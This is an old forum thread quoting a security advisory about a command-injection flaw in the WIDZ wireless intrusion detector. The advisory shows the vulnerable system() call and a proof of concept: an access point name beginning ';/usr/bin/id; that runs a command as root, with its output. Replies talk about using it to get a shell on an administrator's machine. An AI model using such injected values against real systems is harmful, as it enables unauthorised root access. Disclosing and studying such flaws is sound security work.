vnet576
Sep 4 2003, 02:24 AM
This looks like a very interesting tool...as far as I understood it allows you to catch people trying to access your wireless network and it gives u a root shell on THEIR pc. Maybe some one could compile this or knows more about this exploit.
http://www.securiteam.com/unixfocus/5XP0T15AUM.html| CODE |
Vulnerable systems:
* WIDZ version 1.5 and prior
Vulnerable code:
do_alert(char *target)
{
char mess[100];
if ( DEBUG )
printf("Alert unknown AP %s\n", target);
sprintf(mess,"Alert 'unknown AP %s\n'", target);
system(mess);
// Should do a check to see if we've alerted already but !!!
}
As you can see the function system(mess) is executed without proper filtering, therefore it is possible to cause it to execute arbitrary code.
Go to apple airport and set network name to ';/usr/bin/id; (Use HostAP instead)
snifz0r widz # ./widz_apmon 1 eth1 monitor
unknown AP essid=
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh: -c: line 3: unexpected EOF while looking for matching `''
sh: -c: line 4: syntax error: unexpected end of file
At this point, the attacker can pretty much do what they wish. As a side note this is not the only WIDZ program to make use of system() in this manor.
|
hacket
Sep 4 2003, 07:18 AM
heheh,
well this is more for us getting a shell on the admins box; or whatever...
using it u can execute arbitary code on his machine.
This got nothing to do with getting a shell on ones "bugler"
read the article pal ...!
nice post though....
cya
h4k3t
vnet576
Sep 4 2003, 07:25 PM
I did..maybe i misinterpreted it but look
| QUOTE |
| allowing you to catch bad guys in action |
